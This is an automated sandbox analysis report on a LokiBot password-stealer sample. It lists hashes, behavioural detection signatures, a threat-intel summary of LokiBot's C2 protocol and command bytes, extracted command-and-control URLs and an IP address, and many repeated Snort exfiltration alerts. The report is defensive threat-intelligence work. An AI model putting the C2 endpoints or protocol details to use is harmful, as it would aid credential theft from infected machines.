Windows Analysis Report
gunzipped.exe

Overview

General Information

Sample name:	gunzipped.exe
Analysis ID:	1427123
MD5:	8864b52d242037414b7c4a230c390ab8
SHA1:	47680d0f0d286097f7cdda37947aaaacd7226ee3
SHA256:	d405284f75cde4b8c45e3d5c3b41c7bbd6db2c75788cb6d0b1deec5ea60559a4
Tags:	exeLoki
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected Lokibot

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php	URL Reputation: Label: malware

Found malware configuration

Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://136.244.109.75/index.php/1748937"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Virustotal: Detection: 33%			Perma Link

Multi AV Scanner detection for submitted file

Source: gunzipped.exe

ReversingLabs: Detection: 18%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: gunzipped.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: gunzipped.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: gunzipped.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 4x nop then jmp 052FAB1Ah		0_2_052FAC9B
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 4x nop then jmp 06329CEAh		9_2_06329E6B

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49705 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49705 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49705 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49705 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49706 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49706 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49706 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49706 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49707 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49707 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49707 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49707 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49708 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49708 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49708 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49708 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49709 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49709 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49709 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49709 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49710 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49710 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49710 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49710 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49711 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49711 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49711 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49711 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49712 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49712 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49712 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49712 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49713 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49713 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49713 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49713 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49714 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49714 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49714 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49714 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49716 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49716 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49716 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49716 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49723 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49723 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49723 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49723 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49724 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49724 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49724 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49724 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49725 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49725 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49725 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49725 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49726 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49726 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49726 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49726 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49727 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49727 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49727 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49727 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49728 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49728 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49728 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49728 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49729 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49729 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49729 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49729 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49730 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49730 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49730 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49730 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49731 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49731 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49731 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49731 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49732 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49732 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49732 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49732 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49733 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49733 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49733 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49733 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49734 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49734 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49734 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49734 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49735 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49735 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49735 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49735 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49736 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49736 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49736 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49736 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49737 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49737 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49737 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49737 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49738 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49738 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49738 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49738 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49739 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49739 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49739 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49739 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49740 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49740 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49740 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49740 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49741 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49741 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49741 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49741 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49742 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49742 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49742 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49742 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49743 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49743 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49743 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49743 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49744 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49744 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49744 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49744 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49745 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49745 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49746 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49746 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 136.244.109.75:80
